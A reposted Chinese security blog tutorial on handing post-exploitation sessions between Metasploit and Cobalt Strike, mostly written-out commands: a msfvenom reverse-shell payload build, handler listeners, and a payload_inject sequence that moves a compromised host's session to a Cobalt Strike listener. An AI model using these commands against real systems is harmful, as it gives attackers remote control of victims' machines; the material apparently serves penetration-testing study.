浅谈Msfconsole和CS的联动

admin 2022年11月1日12:25:38安全文章评论12 views1106字阅读3分41秒阅读模式

msfconsoleCs是我们最常用的两款渗透神器。每款工具都有自身的优点和缺点。如cs用于强悍的图形界面,完善的团队协作。但是功能上面就没有msfconsole强悍了。如何做到两者相互配合呢?

MSF上线给CS

当msf得到了会话的session。如何将其传递给cs呢?我们先用kali生成一个shell

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost= 192.168.123.74 lport= 5555 -f exe > kali.exe

浅谈Msfconsole和CS的联动在msf中配置监听

use exploit/multi/handler 
set payload windows/x64/meterpreter_reverse_tcp 
set lhost 192.168.123.74
set lport 5555
exploit 

浅谈Msfconsole和CS的联动配置cs

在CS中创建监听器监听器类型:windows/beacon_http/reverse_httpHost修改为对应cs的IP,监听指定端口,等待MSF发送。

浅谈Msfconsole和CS的联动从msf中转移会话到cs

#使当前会话到后台允许
background
# 使用payload_inject模块,执行之后会在本地产生一个新的Handler
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set LHOST <CS_IP>
set LPORT <CS_Port>  #这里的端口填写cs的端口
set session <Session_ID> #指定id
#设置MSF不启动监听,不然MSF会提示执行成功,但没有会话建立
set disablepayloadhandler true
run
浅谈Msfconsole和CS的联动

运行后,我们到cs中就可以看到转移的会话了。

浅谈Msfconsole和CS的联动

CS会话转移msf

我们先在msf中配置参数

use exploit/multi/handler
set payload windows/meterpreter/reverse_http # 不要用64位
set lhost <MSF_IP>
set lport <MSF_Port>   # 设置任意端口进行监听
run

然后再Cs中配置监听,效果如下:

浅谈Msfconsole和CS的联动

CS中右键会话,点击Spawn,选择MSF的监听器,成功得到会话。

浅谈Msfconsole和CS的联动

后记

由于Cs版本等问题,在实际操作中可能存在一定的不同。需根据自身情况而定。另外本机仅供学习交流和研究,请勿用于非法等目录。

更多精彩文章 欢迎关注我们


原文始发于微信公众号(kali黑客笔记):浅谈Msfconsole和CS的联动

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月1日12:25:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  浅谈Msfconsole和CS的联动 http://cn-sec.com/archives/1384120.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: